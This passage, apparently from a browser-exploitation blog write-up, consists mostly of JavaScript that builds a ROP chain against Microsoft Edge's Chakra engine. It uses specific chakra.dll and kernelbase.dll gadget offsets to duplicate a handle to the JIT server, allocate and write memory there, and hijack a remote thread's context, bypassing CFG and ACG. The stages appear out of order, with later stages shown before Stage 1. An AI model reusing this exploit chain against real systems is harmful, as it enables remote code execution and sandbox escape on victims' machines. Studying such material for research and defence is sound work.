write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
next();

After preserving CONTEXT.Rsp, we can manipulate CONTEXT.Rip to directly point to our ret gadget. We don’t really need to save this address, because once we are done writing to it, we simply don’t need to worry about it anymore.

Now that we have RSP preserved, it is finally time to use one last call to WriteProcessMemory to write our final VirtualProtect ROP chain into the JIT process.

WriteProcessMemory ROP Chain (Round 4)

Our last step is to write our ROP chain into the remote process. You may be thinking - “Connor, we just hijacked RIP. Why can’t we just hijack RSP instead of writing our payload to the existing stack?” Great question! We know that if we call SetThreadContext, CFG doesn’t perform any validation on the instruction pointer to ensure we aren’t calling into the middle or end of a function. There is now way for CFG to know this! However, CFG does perform some slight validation of the stack pointer on SetThreadContext calls - via a function called RtlGuardIsValidStackPointer.

When the SetThreadContext function is called, this performs a syscall to the kernel (via NtSetContextThread). In the kernel, this eventually leads to the kernel version of NtSetContextThread, which calls PspSetContextThreadInternal.

PspSetContextInternal eventually calls KeVerifyContextRecord. KeVerifyContext record eventually calls a function called RtlGuardIsValidStackPointer.

This feature of CFG checks the TEB to ensure that any call to SetThreadContext has a stack base and limit within the known bounds of the stack managed by the TEB. This is why we cannot change RSP to something like our VirtualAllocEx allocation - as it isn’t within the known stack bounds. Because of this, we have to directly write our ROP payload to the existing stack (which we leaked via GetThreadContext).

With that said, let’s see our last WriteProcessMemory call. Here is how the call will be setup:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	NULL 						// Optional
);
// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
